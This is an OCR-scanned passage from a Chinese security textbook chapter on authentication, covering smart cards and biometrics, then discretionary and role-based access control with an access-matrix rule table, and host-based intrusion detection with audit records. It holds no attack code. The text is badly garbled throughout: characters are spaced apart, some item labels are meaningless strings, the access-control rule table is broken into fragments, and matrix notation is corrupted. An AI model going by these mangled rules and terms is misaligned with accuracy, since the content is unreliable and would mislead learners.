> 询问 -应 答 : 在 这 种 情况 下 ， 计算机 系统 产生 一 个 问题 ， 就 像 是 随机 的 一 个 字符 串 或 
BAF, 智能 令 牌 产生 一 个 基于 这 个 问题 的 应 答 , 例如 使 用 公共 密 钥 密码 系统 , 令 牌 
能 够 通过 自身 的 私人 密 钥 对 问题 进行 加 密 。 
用 于 用 户 与 计算 机 的 身份 验证 ， 最 重要 的 一 类 智能 令 牌 是 智能 卡 ， 它 的 外 形 与 信用 卡 相似 ， 
有 一 个 电子 化 的 界面 ， 可 以 使 用 任何 类 型 的 协议 ， 本 章 的 剩余 部 分 将 讨论 这 种 智能 卡 。 
智能 卡 包含 一 个 完整 的 微 处 理 器 ， 包 括 处 理 器 、 内 存 和 LO 端口 ， 某 些 版 本 采用 特殊 的 协 处 理 
电路 来 进行 加 密 操 作 ， 从 而 加 快 了 编码 和 解码 的 速度 ， 或 者 生成 数字 签名 来 验证 信息 的 传送 。 在 某 
些 卡 中 ，IO 端口 可 以 与 兼容 读 卡 器 直接 连接 ， 其 他 卡 依赖 于 一 个 嵌入 式 的 无 线 天 线 与 读 卡 器 交互 。 


15.1.4 生物 特征 识别 认证 


生物 特征 识别 认证 系统 试图 基于 唯一 的 物理 特性 验证 一 个 个 体 , 这 些 包 括 静 态 特 性 , 例如 指 
纹 、 手 形 、 面 部 特征 、 视 网 膜 和 虹膜 模式 ; 动态 特征 ,例如 声 纹 和 签字 。 从 本 质 上 说 ,生物 特征 
识别 技术 基于 模式 识别 。 与 密码 和 令 牌 相 比 ， 生 物 特征 识别 认证 具有 技术 复杂 性 和 花费 昂贵 性 。 
当 它 被 用 于 一 些 特殊 应 用 时 , 生物 特征 识别 技术 尚未 完全 成 熟 到 像 一 个 成 熟 的 工具 一 样 , 成 为 用 
户 验 证 的 计算 机 系统 。 
一 些 不 同类 型 的 物理 特性 都 在 被 使 用 或 处 于 用 户 验证 的 研究 中 ， 它 们 最 常见 的 共同 点 如 下 : 
o 面部 特征 : 面部 特征 是 最 常见 的 人 类 识别 手段 ， 因 此 ， 很 自然 地 考虑 到 通过 计算 机 来 验 
证 。 最 常见 的 方法 就 是 基于 关键 面部 特征 的 相对 位 置 和 外 形 来 定义 特征 。 例 如 ， 眼 睛 、 
眉毛 、 鼻 子 、 嘴 唇 和 下 书 的 形状 。 另 一 种 方法 是 使 用 红外 线 相机 来 产生 一 个 面部 温度 记 
录 图 ， 并 将 其 与 人 类 的 面部 血管 体系 相关 联 。 
@ 指纹 : 指纹 作为 一 种 验证 身份 的 手段 已 经 有 数 百年 的 历史 了 ， 整 个 过 程 以 法 律 执行 为 目 
的 , 已 经 系统 化 和 自动 化 了 。 指 纹 是 指 手指 上 的 疹 和 沟 形 成 的 样式 ,在 所 有 的 人 类 中 ， 
每 个 人 的 指纹 被 认为 是 唯一 的 。 而 实际 上 ， 自 动 指纹 识别 系统 选取 一 部 分 指纹 特征 ， 并 
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用 数字 的 方式 来 存储 整个 指纹 的 模式 。 

@ FH: 手 形 识别 系统 识别 手 的 特征 ， 包 括 形状 以 及 手指 的 长 度 和 宽度 等 。 

o RRMA: 该 模式 是 由 视网膜 下 的 纹理 形成 的 ， 它 是 唯一 的 ， 因 此 适合 用 来 验证 ， 视 
网 膜 生物 识别 系统 通过 发 射 低 强度 的 视线 或 是 红外 线 到 你 的 眼中 ， 从 而 获得 一 个 视网膜 
模式 的 数字 图 像 。 

@ 虹膜 模式 另 一 种 独特 的 物理 特性 就 是 虹膜 的 具体 结构 。 

o 签名 : 每 个 人 都 有 唯一 的 笔迹 ， 尤 其 是 在 签字 的 时 候 更 加 明显 ， 它 具有 一 个 典型 的 频繁 
的 书写 次 序 。 但 是 许多 签名 的 抽样 都 是 不 一 样 的 ， 这 使 得 开发 能 够 匹配 将 来 样式 的 签名 
的 计算 机 显示 的 任务 变 得 更 加 复杂 了 。 

@ FF: 然而 每 个 人 的 签名 风格 不 仅仅 是 书写 者 的 物理 属性 ， 同 时 也 是 一 种 书写 习惯 。 声 
音 模式 能 够 更 加 贴近 说 话 者 的 身体 特征 。 然 而 ， 同 一 个 说 话 者 时 间 不 同 ,说 话 的 梯 本 也 
会 不 同 ， 从 而 使 得 生物 识别 任务 变 得 更 加 复杂 。 

图 15.2 给 出 了 一 个 关于 生物 特征 识别 技术 精确 度 与 相对 成 本 之 间 的 关系 ,精度 的 概念 不 适 

用 于 使 用 智能 卡 或 密码 来 进行 身份 验证 的 方案 。 例 如 , 如 果 用 户 输入 一 个 密码 , 它 只 有 两 种 可 能 ， 
完全 匹配 与 完全 不 匹配 , 而 对 于 生物 识别 技术 而 言 , 系统 必须 确定 目前 的 这 个 生物 识别 特征 与 存 
储 的 特征 匹配 到 什么 程度 , 在 希 述 生物 特征 识别 技术 的 准确 度 这 个 概念 之 前 , 我 们 需要 对 生物 特 
征 识别 系统 有 一 个 总 体 的 了 解 。 





图 15.2 各 种 生物 特征 识别 特征 认证 方案 的 成 本 与 精度 的 对 应 关系 


15.2 访问 控制 


访问 控制 策略 中 规定 哪 种 访问 在 什么 样 的 情况 下 , 对 于 什么 人 来 说 是 允许 的 , 访问 控制 策略 
一 般 分 为 一 下 几 类 : 

e 自主 访问 控制 (DAC): 访问 控制 基于 请 求 者 的 身份 以 及 授权 的 访问 规则 ， 即 说 明 什么 
样 的 请 求 者 允许 执行 ， 这 项 策略 的 条 件 是 任意 的 ， 因 为 一 个 实体 可 能 具备 访问 权限 ， 并 
通过 它 自己 的 意志 使 得 另外 一 个 实体 也 能 够 访问 某 些 资源 。 

e 强制 访问 控制 (MAC ) : 访问 控制 基于 比较 安全 的 标签 ( 一些 灵敏 的 或 关键 的 系统 资源 )， 
并 能 够 安全 地 清除 ( 这 表明 系统 的 实体 有 资格 获得 某 些 资源 ), 这 项 策略 是 强制 性 的 ， 因 
为 有 些 实体 可 能 没有 清除 访问 资源 ， 而 是 按照 自己 的 意愿 使 得 另外 一 个 实体 也 能 够 访问 
某 些 资源 。 

@ 基于 角色 的 访问 控制 (RBAC): 访问 控制 基于 用 户 在 系统 中 的 角色 ， 以 及 在 某 些 特定 
的 条 件 和 规则 下 的 访问 是 允许 的 。 

自主 访问 控制 是 传统 执行 的 访问 控制 方法 ， 这 种 方法 在 第 12 章 中 介绍 过 ， 本 节 将 提供 更 多 
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的 细节 。 强制 访问 控制 是 从 军事 信息 安全 中 演化 出 来 的 一 个 概念 , 不 在 本 书 的 讨论 范围 内 。 基 于 角 
色 的 访问 控制 则 越 来 越 受 欢迎 ， 稍 后 将 在 本 节 中 介绍 。 

这 三 种 方法 不 是 相互 排斥 的 ( 如 图 15.3 所 示 ), 访问 控制 机 制 
可 以 同时 使 用 两 种 或 三 种 这 样 的 方法 来 覆盖 不 同类 型 的 系统 资源 。 


15.2.1 自主 访问 控制 9 


本 节 介绍 一 个 由 Lampson、Graham 和 Denning 开发 的 自主 访问 
控制 一 般 模型 [LAMP71，GRAH72，DENN71], 该 模型 假设 有 一 组 
主体 、 一 组 对 象 和 一 组 规则 ， 通 过 规则 来 管理 主体 对 对 象 的 访问 。 图 15.3 访问 控制 方法 
让 我 们 来 定义 系统 信息 集 的 保护 状态 , 在 某 个 特定 的 时 间 里 , 每 个 主体 目 特定 的 访问 权限 与 每 个 
对 象 相关 。 我 们 能 够 确定 三 个 要 求 : 标识 保护 状态 、 执 行 访 问 权 限 以 及 允许 主体 使 用 某 些 特定 的 
方法 来 改变 这 种 保护 状态 。 该 模型 满足 了 这 三 个 要 求 , 给 了 自主 访问 控制 系统 一 个 一 般 的 逻辑 性 
的 描述 。 

为 了 表现 这 种 保护 状态 ， 我 们 扩展 了 在 访问 控制 矩阵 中 的 对 象 领域 ， 如 下 所 示 : 

o 进程 : 访问 权限 包括 可 以 删除 、 停 止 和 唤醒 一 个 进程 。 

@ 设备 : 访问 权限 包括 能 够 读 / 写 设备 ， 控 制 其 操作 〈 例如 磁盘 搜索 )， 并 能 够 用 于 阻塞 和 

非 阻塞 设备 。 

@ 内 存 位 置 或 区 域 : 访问 权限 包括 能 够 读 / 写 某 些 特定 区 域 的 内 存 ， 而 这 些 内 存 是 被 保护 和 

禁止 访问 的 。 

@ th: 主体 的 访问 权限 可 以 授权 或 删除 其 他 对 象 的 访问 权限 ， 将 在 后 面 进行 介绍 。 

示例 见 图 15.4( 与 图 12.13a 对 比 )。 对 于 一 个 访问 控制 矩阵 4， 和 矩阵 中 每 一 个 元 ASX] 包 
含 的 字符 串 称 为 访问 属性 ， 指 定 了 主体 5 对 对 象 了 的 访问 权限 。 例 如 ， 在 图 15.44, S, 能 够 读 
取 文 件 F,， 因 为 在 AS, Fi] 中 包括 了 “ 读 取 ”。 





主体 





*= 复 制 标 志 设 置 
图 15.4 扩展 访问 控制 矩阵 


从 逻辑 或 者 功能 的 视角 来 看 ， 对 于 每 一 类 对 象 ， 都 联系 着 一 个 单独 的 访问 控制 模型 ( 见 图 
15.5 )。 这 个 模型 评估 由 一 个 主体 提出 的 访问 一 个 对 象 的 请 求 ， 判 断 是 否 存 在 相应 的 访问 权限 。 
一 次 访问 请 求 将 引发 以 下 步骤 : 

1) 主体 So 发 起 对 对 象 天 的 c 类 型 的 访问 请 求 。 

2 ) 该 请 求 使 得 系统 ( 操作 系统 或 一 个 某 种 类 型 的 访问 控制 接口 模块 ) 生成 一 条 格式 为 5， 

aX) 的 信息 ， 并 发 送 到 的 控制 者 。 

3 ) 控制 器 检查 访问 矩阵 4 来 判断 a 是 否 在 ASX] 中 ， 如 果 是 ， 则 允许 访问 。 如 果 不 是 ， 


O ”在 继续 学 习 之 前 ， 读 者 应 该 复习 一 下 12.7 节 的 内 容 和 12.8 节 中 讨论 的 UNIX 文件 访问 控制 部 分 。 


B15 È AKMZEARK ` 457 


拒绝 访问 请 求 并 且 发 出 一 个 保护 性 违例 。 这 个 违例 将 引发 一 个 警告 和 相应 的 行动 。 





系统 处 理 一 
i 对 象 


主体 ; 访问 控制 机 制 
wR F 1 Si, read, F 





图 15.5 访问 控制 功能 的 组 织 图 


从 图 15.5 中 可 看 出 ， 从 一 个 主体 到 一 个 对 象 的 每 一 个 访问 请 求 都 由 该 对 象 的 控制 器 处 理 ， 
控制 器 的 决定 基于 访问 矩阵 当前 的 内 容 。 另 外 ， 某 些 主体 拥有 对 访问 和 矩阵 做 出 特定 修改 的 权限 。 
一 条 修改 访问 矩阵 的 请 求 被 视 为 对 矩阵 的 访问 并 且 和 矩阵 中 单独 的 元 被 视 为 对 象 。 这 样 的 访问 由 一 
个 管理 对 矩阵 的 更 新 的 访问 矩阵 控制 器 进行 处 理 。 

这 个 模型 同样 包括 一 组 对 修改 访问 矩阵 的 管理 规则 ， 见 表 15.1。 为 了 实现 这 个 目标 ， 我 们 
引 和 人 访问 权限 “所 有 者 ”和 “控制 ”"， 以 及 拷贝 标志 的 概念 ， 在 接 下 来 的 段落 将 详细 解释 。 

前 3 条 规则 分 别处 理 访问 权限 的 转移 、 授 权 和 删除 。 假 设 元 a* 在 4[5o, 加 中 ， 这 表示 Sy 拥 
有 对 对 象 六 的 访问 权限 a， 并 且 因 为 有 拷贝 标志 ，5S。 能 够 将 这 个 权限 ( 带 有 拷贝 标志 或 者 不 
带 ) 转移 给 另 一 个 主体 。 规则 RI 表示 这 项 能 力 。 考 虑 到 新 的 主体 可 能 恶意 地 把 访问 权限 转 
移 给 其 他 不 应 具有 该 访问 权限 的 主体 ， 一 个 主体 可 以 转移 不 带 拷 贝 标 志 的 访问 权限 。 例 如 ， 
S WWE F, 列 中 的 所 有 矩阵 元 中 放置 ‘read’? 或 者 ‘reade 权限 。 规 则 R2 指定 ， 如 果 So 是 对 
象 世 的 所 有 者 ， 则 So 可 以 将 对 对 象 忒 的 访问 权限 授权 给 其 他 任意 主体 。 规 则 R2 指定 ， 如 果 
So 具有 对 于 对 象 下 的 “所 有 者 ”访问 权限 ， 则 So 可 以 为 任意 Ss 添加 访问 权限 到 ASX). A 
则 R3 允许 So 从 一 个 矩阵 元 中 删除 任意 访问 权限 ， 当 这 个 矩阵 元 位 于 So 控制 的 主体 的 行 中 ， 
或 者 位 于 So 拥有 的 对 象 的 列 中 。 规 则 R4 允许 一 个 主体 读 取 它 所 拥有 或 者 控制 的 矩阵 部 分 。 

表 15.1 中 其 余 的 规则 管理 主体 和 对 象 的 创建 和 删除 。 规 则 RS 指定 ， 任 意 主 体 均 可 创建 由 
该 主体 拥有 的 新 对 象 ， 并 且 可 授权 或 者 删除 对 该 对 象 的 访问 权限 。 在 规则 R6 中 ， 一 个 对 象 的 所 
有 者 能 够 销毁 这 个 对 象 ， 这 将 删除 访问 抢 阵 中 对 应 的 列 。 规 则 R7 允许 任意 主体 创建 新 的 主体 ， 
创建 者 拥有 新 的 主体 , 并 且 新 的 主体 拥有 对 自身 的 控制 权限 。 规则 R8 允许 一 个 主体 的 所 有 者 删 
除 该 主体 ， 同 时 也 删除 访问 矩阵 中 该 主体 对 应 的 行 和 列 〈 如 果 有 主体 对 应 的 列 )。 
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表 15.1 访问 控制 系统 命令 


和 角 色 | 命令 (by so | 身份 认证 n f 


‘control’ in A[So, S$] 

R3 从 S,X 中 删除 w or 从 AIS, X] 中 删除 a 
‘owner’ in A[So, X] 
‘control’ in A[So, S) 

R4 读 S,X 到 w or 将 ALS, 加 拷贝 到 w 
‘owner’ in A[So, X] 


增加 从 4 到 X HOP: 
RS fil Bt RX 无 


R6 HRN RX ‘owner’ in A[So, X] 删除 从 4 到 X 的 列 

添加 从 4 到 5 的 行 ; 

执行 命令 create object S; 

# ‘control’ 保存 到 ALS, S] 中 


无 
删除 从 4 到 5 的 行 
“yh ‘ * in A[So, 


表 15.1 中 的 规则 集合 是 一 个 访问 控制 系统 规则 集合 的 例子 。 接 下 来 的 部 分 是 能 够 被 包括 在 
规则 集合 中 的 附加 或 者 可 选 规则 的 例子 。 一 个 仅 允 许 转移 的 权限 也 能 够 被 定义 , 转移 的 权限 被 添 
加 到 目标 主体 , 并 从 原 有 的 主体 中 删除 。 如 果 不 允 许 所 有 者 权限 的 拷贝 标志 , 也 可 以 将 对 象 或 者 
主体 的 拥有 者 数量 限制 为 一 个 。 

主体 创建 另 一 个 主体 并 且 具 有 新 主体 的 “所 有 者 ”访问 权限 的 功能 ,能 够 用 于 定义 一 个 主体 
的 层次 结构 。 例 如 ， 在 图 15.4 中 ，8 拥有 SLA S, SAS ES 的 下 级 。 根 据 表 15.1 中 的 规则 ， 
Si 能 够 将 S 已 经 拥有 的 权限 授权 给 S,, 或 者 从 S 删除 这 些 权 限 。 这 项 功能 很 有 用 ， 例 如 ， 当 一 个 
主体 需要 调用 一 个 未 取得 完全 信任 的 程序 ， 又 不 希望 该 程序 能 够 将 权限 转移 给 其 他 主体 的 时 候 。 


15.2.2 ”基于 角色 的 访问 控制 


传统 的 DAC 系统 为 单独 用 户 或 者 用 户 群 组 定义 访问 权限 。 相 比 之 下 ，RBAC 则 是 基于 用 户 
在 系统 中 的 角色 ， 而 不 是 基于 用 户 标识 。 典 型 地 ，RBAC 模型 定义 一 个 角色 ， 如 同一 个 组 织 中 的 
一 项 工作 职能 。RBAC 系统 将 访问 权限 分 配给 角色 ， 而 不 是 分 配给 用 户 。 这 样 ,根据 用 户 的 不 同 
职责 ， 再 静态 或 动态 地 分 配给 不 同 的 角色 。 

现在 ，RBAC 在 商业 上 被 广泛 应 用 , 并 且 是 一 个 很 活跃 的 研究 领域 。 美国 国家 标准 技术 研究 
院 已 经 制定 了 一 项 标准 《密码 模块 的 安全 需求 》( FIPS PUB 140-2，May 25，2001 )， 这 项 标准 需 
要 通过 角色 进行 访问 控制 和 管理 。 

和 角色 与 资源 或 者 系统 对 象 之 间 的 关系 一 样 , 用 户 和 角色 之 间 是 多 对 多 的 关系 ( 见 图 15.6 )。 
用 户 集合 是 可 变 的 , 而 且 在 一 些 情况 下 用 户 集合 会 经 常 性 地 改变 , 同样 , 分 配给 一 个 用 户 的 一 个 
或 者 多 个 角色 也 是 可 变 的 。 在 绝 大 部 分 情况 下 , 系统 中 的 角色 集合 倾向 于 静态 的 , 偶尔 有 新 增 或 
者 删除 。 每 一 个 角色 对 一 个 或 者 多 个 资源 拥有 特定 的 访问 权限 。 资 源 集合 与 特定 访问 权限 联系 到 
一 个 具体 角色 上 ， 这 种 联系 也 同样 是 很 少 改变 的 。 


.| 保存 到 ALS, X] 
Qa 


fl 保存 到 ALS, X] 


a 





R7 创建 主体 5 
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15.6 用户、 角色 和 资源 


我 们 能 够 使 用 访问 矩阵 的 表示 方式 简单 地 描述 RBAC 系统 中 的 关键 元 素 ， 如 图 15.7 所 示 。 上 
方 的 矩阵 连接 单独 用 户 到 角色 。 通 常用 户 比 角 色 数 量 更 多 。 每 一 个 矩阵 元 均 是 空 的 或 者 被 标记 的 ， 
后 一 个 矩阵 表示 用 户 被 分 配给 角色 。 注 意 , 一 个 用 户 能 够 分 配给 多 个 角色 ( 每 行 中 多 于 一 个 标记 )， 
一 个 角色 也 能 够 分 配给 多 个 用 户 ( 每 列 多 于 一 个 标记 )。 将 角色 视 为 主体 ， 则 下 方 的 矩阵 和 DAC 
访问 控制 矩阵 的 结构 相同 。 通 常 ， 角 色 很 少 ， 而 对 象 或 资源 很 多 。 在 这 个 矩阵 中 ， 和 矩阵 元 表示 角 
色 拥有 的 特定 访问 权限 。 注 意 ， 一 个 角色 能 够 被 视 为 一 个 对 象 ， 从 而 允许 定义 角色 的 层次 结构 。 


R 





R- eee 





15.7 RBAC 的 访问 控制 权限 矩阵 图 
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RBAC 是 一 个 最 小 权限 原则 的 有 效 实现 。 也 就 是 说 , 每 一 个 角色 都 应 包括 这 个 角色 所 需要 的 
权限 的 最 小 集合 。 用 户 分 配给 一 个 角色 , 仅 允 许 这 个 用 户 执行 这 个 角色 所 需要 的 操作 。 分 配给 同 
一 个 角色 的 多 个 用 户 ， 拥 有 相同 的 最 小 访问 权限 集 。 


15.3 ”入侵 检测 


以 下 RFC 2828 ( 见 《Internet 安全 术语 》) 中 的 定义 与 我 们 的 讨论 相关 : 

对 安全 性 的 入 侵 ; 一 个 安全 事件 或 者 一 些 安全 事件 的 组 合 ， 入 侵 者 在 未 授权 的 情况 下 获得 ， 
或 者 试图 获得 系统 的 访问 权限 (或 者 系统 资源 )， 它 们 构成 一 次 安全 事故 。 

入 侵 检 测 : 一 个 为 发 现 未 授权 的 系统 资源 访问 , 并 提供 实时 或 者 近似 实时 的 警告 而 监控 和 分 
析 系 统 事 件 的 系统 服务 。 

入 侵 检 测 系 统 分 为 以 下 几 种 ; 

@ 基于 主机 的 入 侵 检 测 系统 : 监控 一 个 主机 的 特征 和 主机 内 发 生 的 能 导致 可 疑 行为 的 事件 。 

@ 基于 网 络 的 入 侵 检 测 系统 : 监控 特定 网 络 段 或 网 络 设 备 上 的 通信 ， 并 且 分 析 网 络 、 传 输 
以 及 应 用 协议 来 识别 可 疑 活动 。 

一 个 入 侵 检 测 系 统 包 括 三 个 逻辑 组 件 : 

O 探测 器 : 探测 器 负责 收集 数据 。 探 测 器 的 输入 可 能 是 系统 中 能 够 包含 侵入 的 证 据 的 任意 
部 分 。 探 测 器 的 输入 类 型 包括 网 络 数据 包 、 日 志文 件 以 及 系统 调用 的 追踪 记录 。 探 测 器 
收集 信息 并 且 转 交 给 分 析 器 。 

@ 分 析 器 : 分 析 器 从 一 个 或 多 个 探测 器 或 从 其 他 分 析 器 接收 输入 。 分 析 器 负责 判断 是 否 有 
入 侵 发 生 。 这 个 组 件 的 输出 是 关于 人 侵 是 否 发 生 的 判断 。 输 出 还 可 以 包括 支持 这 个 人 侵 
是 否 发 生 的 结论 的 证 据 。 分 析 器 可 以 提供 入 侵 发 生 时 可 采取 的 动作 的 指导 。 

@ 用 户 界 面 : 人 侵 检测 系统 的 用 户 界面 使 用 户 可 以 观察 系统 的 输出 或 控制 系统 的 行为 。 在 
其 他 系统 中 ， 用 户 界面 可 能 会 等 同 于 管理 器 、 控 制 器 或 控制 台 组 件 。 


15.3.1 基本 原则 


验证 工具 、 访问 控 制 工具 和 防火 墙 都 在 人 侵 防 护 中 起 着 作用 。 另 一 道 防线 就 是 人 侵 检 测 ， 这 
是 近 些 年 许多 研究 的 焦点 。 这 种 兴趣 是 由 如 下 动机 所 推动 的 : 

1) 如 果 及 时 检测 出 人 侵 ， 则 可 以 在 任何 破坏 发 生 或 任何 数据 被 危及 之 前 确定 人 侵 者 ， 并 将 

其 逐 出 系统 。 

2 ) 一 个 有 效 的 人 侵 检 测 系 统 可 以 作为 一 个 威慑 ， 用 以 预防 人 侵 。 

3) 入 侵 检测 可 以 用 收集 到 的 人 侵 技 术 的 信息 来 加 强人 侵 防 护 的 手段 。 

入 侵 检测 基于 这 样 一 个 假设 : 入 侵 者 的 行为 与 合法 用 户 在 一 些 可 被 量化 的 方面 可 以 被 区 分 。 
当然 , 我 们 不 能 期 望 对 入 侵 者 的 攻击 和 授权 用 户 对 正常 资源 的 使 用 有 一 个 简单 、 准 确 的 区 分 , 两 
者 必定 会 有 一 些 重 公 。 

图 15.8 用 抽象 的 术语 描述 了 一 个 人 侵 检 测 系统 的 设计 者 所 要 面 对 的 任务 的 本 质 。 虽 然 典型 
的 人 侵 者 行为 和 典型 的 授权 用 户 行为 是 不 同 的 , 但 是 这 些 行 为 之 间 还 是 有 重 玖 的 。 因 此 , 一 个 宽 
泛 的 入 侵 行 为 解释 可 以 捕获 更 多 人 侵 者 ， 但 也 会 造成 一 定数 量 的 误 报 率 〈false positive) 或 将 授 
权 用 户 识别 为 人 侵 者 。 另 一 方面 ， 为 了 限制 误 报 率 而 使 用 严格 的 人 侵 行 为 解释 则 会 造成 漏 报 率 
(false negative) 的 增长 ， 或 使 人 侵 者 没有 被 识别 为 人 侵 者 。 因 此 ， 在 和 人 侵 检测 的 实践 中 会 有 一 
个 折衷 和 艺术 的 成 分 。 

在 Anderson 的 研究 中 [ANDE80], 通过 合理 的 可 信和 度 , 可 以 假设 冒充 者 与 合法 用 户 是 能 被 区 
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分 开 的 。 通 过 观察 合法 用 户 的 历史 可 以 确定 其 行为 模式 , 显著 的 对 这 些 模式 的 背离 可 以 被 检查 出 
Xo Anderson 认为 检测 一 个 非法 行为 者 (合法 用 户 进行 未 授权 的 活动 ) 更 加 困难 ， 这 时 正常 行 
为 与 异常 行为 的 区 别 是 很 小 的 。Anderson 推断 这 些 侵害 是 不 能 在 搜索 异常 行为 时 被 单独 检测 出 
来 的 。 然 而, 非法 行为 者 的 行为 仍然 还 是 可 以 通过 对 未 授权 使 用 的 条 件 类 别 进行 明智 的 定义 来 检 
测 出 。 最 后 , 对 秘密 用 户 的 检测 被 认为 是 超过 了 纯 自 动 化 技术 的 范围 。 这 些 1980 年 的 观察 资料 ， 
至 今 仍然 有 效 。 

在 本 节 的 后 面部 分 ， 我 们 将 集中 讨论 基于 主机 的 人 侵 检测 。 


BH BE PH 
入 侵 者 行为 曲线 授权 用 户 行为 曲线 






观察 或 预期 行为 的 重 释 


入 侵 者 行为 平均 值 ”授权 用 户 行为 平均 值 ”可 量化 行为 参数 
图 15.8 入侵 者 与 授权 用 户 的 行为 曲线 


15.3.2 ”基于 主机 的 入 侵 检 测 技术 


基于 主机 的 人 侵 检测 系统 在 诸如 数据 库 服务 器 和 管理 系统 等 易 受 攻击 或 敏感 系统 中 增加 了 
一 层 特 殊 的 安全 软件 。 基 于 主机 的 人 侵 检 测 系 统 用 不 同 的 方式 监测 系统 中 的 活动 , 以 检测 可 疑 的 
行为 。 在 一 些 情 况 下 ， 人 侵 检测 系统 可 以 在 发 生 任何 破坏 之 前 终止 攻击 , 但 是 其 主要 工作 还 是 检 
测 人 侵 、 记 录 可 疑 活 动 和 发 出 警报 。 
基于 主机 的 人 侵 检测 系统 的 主要 优势 在 于 其 可 以 同时 检测 外 部 和 内 部 的 入 侵 ,这 对 于 基于 网 
络 的 人 侵 检测 系统 或 防火 墙 是 不 可 能 的 。 
基于 主机 的 入 侵 检 测 系 统一 般 通 过 以 下 两 种 途径 之 一 来 检测 人 侵 : 
1) 异常 检测 : 包括 收集 合法 用 户 在 一 段 时 间 内 的 行为 相关 的 数据 。 在 判断 被 观察 到 的 用 户 
行为 是 否 为 合法 用 户 行为 时 ， 对 其 进行 统计 测试 ， 从 而 提高 分 析 结 果 的 可 信和 度 。 以 下 是 
两 种 统计 异常 检测 的 方法 : 
a) MERA: 此 种 方法 包括 定义 用 户 无 关 的 、 不 同事 件 发 生 频 率 的 阔 值 。 
b ) 基于 用 户 资料 的 : 为 每 个 用 户 生 成 一 个 关于 活动 的 用 户 资料 ,用 于 检测 个 人 用 户 行为 
的 变化 。 
2 ) 签名 检测 : 包括 尝试 定义 一 组 规则 或 攻击 模式 ， 用 于 决定 一 个 特定 的 行为 是 否 发 自 一 个 
人 侵 者 。 i 
从 本 质 上 来 讲 , 异常 检测 的 方法 尝试 定义 一 般 或 预期 的 行为 , 而 基于 签名 的 方法 尝试 定义 正 
确 的 行为 。 
根据 前 面 所 列 的 攻击 者 类 型 , 异常 检测 对 冒充 者 有 效 , 冒充 者 不 太 可 能 会 模仿 其 所 用 账户 的 
行为 模式 。 另 一 方面 ， 此 技术 可 能 并 不 能 处 理 非 法 行为 者 。 对 于 这 类 攻击 , 基于 签名 的 方法 能 够 
识别 环境 中 的 事件 和 序列 ,并 发 现 渗透 。 实 际 上 , 一 个 系统 可 能 会 使 用 两 种 方法 的 组 合 来 有 效 地 
防范 各 种 类 型 的 攻击 。 | 
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15.3.3 ”审计 记录 

入 侵 检 测 的 一 个 基本 工具 就 是 审计 记录 。 一 - 些 正在 进行 的 用 户 活动 记 录 必 须 作为 人 侵 检 测 系 
统 的 输入 来 进行 维护 。 基 本 上 ， 可 使 用 两 种 方案 : 

@ 本 地 审计 记录 : 事实 上 ， 所 有 多 用 户 操 作 系 统 都 包含 审计 软件 ， 用 以 收集 用 户 活动 的 信 
息 。 使 用 这 些 信息 的 优点 在 于 不 需要 额外 的 收集 软件 。 缺 点 是 本 地 审计 记录 不 一 定 包含 
需要 的 信息 ， 或 其 存储 形式 不 方便 。 

@ 检测 特有 的 审计 记录 : 收集 工具 可 以 实现 为 生成 包含 仅 为 入侵 检测 系统 所 需 信息 的 审计 
记录 。 这 种 方法 的 一 个 优点 在 于 其 可 以 做 成 供应 商 无 关 的 ， 并 移植 到 多 个 系统 ; 缺点 在 
于 在 机 器 上 需要 同时 运行 两 个 审计 软件 包 所 需 的 额外 开销 。 

Dorothy Denning[DENN87] 开 发 了 一 个 检测 特有 的 审计 记录 的 很 好 的 实例 。 每 个 审计 记录 都 

包括 如 下 几 个 域 : 

@ 主体 : 活动 的 发 起 者 。 主 体 通常 为 一 个 终端 用 户 ， 但 也 可 能 是 一 个 代表 用 户 或 用 户 组 的 

进程 。 所 有 的 活动 都 通过 主体 发 出 的 命令 而 发 生 。 可 以 将 主体 分 组 成 不 同 的 访问 级 别 ， 
ce oe WT LAS 
动作 : 主体 对 一 个 对 象 所 进行 的 操作 。 例 如 登录 、 读 取 、 进 行 1O 操作 、 执 行 。 
对 象 : 动作 的 接收 者 。 例 如 文件 、 程 序 、 人 信息、 记录、 终端 、 打 印 机 和 用 户 或 程序 创建 
的 结构 体 。 当 一 个 主体 成 为 一 个 动作 的 接收 者 时 ， 如 电子 邮件 ， 则 此 主体 被 当做 一 个 对 
象 。 对 象 可 以 按 类 型 分 组 。 对 象 的 粒度 根据 对 象 的 类 型 和 环境 而 变化 。 例 如 ， 数 据 库 动 
作 可 能 将 数据 库 当 做 整体 审计 ， 也 可 能 在 记录 级 别 审计 。 7 

© 异常 条 件 : 如 果 存 在 异常 条 件 ， 指 示 哪 个 异常 条 件 在 返回 时 被 引发 。 

@ 使 用 资源 : 一 个 定量 元 素 的 列表 ， 列 表 中 每 个 元 素 给 出 某 种 资源 的 使 用 量 。( 例如 ， 打 印 
或 显示 的 行 数 、 读 取 或 写 人 的 记录 数 、 处 理 器 时 间 、UO 单元 使 用 、 会 话 使 用 时 间 )。 

o MER: 标识 动作 发 生 的 唯一 的 日 期 时 间 戳 。 

多 数 用 户 操作 由 一 些 基本 动作 构成 。 例如 , 文件 复制 包含 了 执行 用 户 命令 ( 包括 访问 验证 和 
初始 化 复制 )、 读 取 文件 、 写 人 另 -一 个 文件 。 考 虑 这 样 一 个 命令 : 

COPY GAME.EXE TO <Library>GAME.EXE 

由 Smith 发 出 ， 从 当前 目录 复制 一 个 可 执行 文件 GAME 到 <Library> 目 录 。 可 能 会 生成 如 下 
审计 记录 : 


在 此 例 中 ,复制 动作 被 终止 了 ， 因 为 Smith 不 具有 对 <Library> 的 写 权限 。 

将 用 户 操作 分 解 为 基本 动作 有 三 个 优势 ; 

1 ) 因为 对 象 是 系统 中 的 受 保 护 的 实体 ， 使 用 基本 动作 使 得 对 对 象 相关 的 所 有 行为 都 受到 审 
计 。 这 样 ， 系 统 可 以 检测 出 对 访问 控制 的 破坏 尝试 (通过 关注 返回 的 异常 条 件数 量 的 异 
常 ) 并 且 通 过 关注 主体 可 访问 的 对 象 集合 中 的 异常 可 以 检测 出 成 功 的 破坏 。 

2 ) 单一 对 象 、 单 一 动作 审计 记录 使 模型 和 实现 简化 。 

3) 因为 简单 、 统 一 的 检测 特有 的 审计 记录 结构 ， 使 获取 此 信息 或 至 少 部 分 信息 ) 相对 简 
单 ， 只 需 将 现 有 的 本 地 审计 记录 做 一 个 到 检测 特有 的 审计 记录 的 映射 即 可 。 
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15.4 恶意 软件 防御 


15.4.1 RARD 


对 病毒 威胁 的 一 个 理想 解决 方法 即 预防 : 在 第 一 时 间 阻 止 病毒 进入 系统 。 虽 然 预防 可 以 降低 
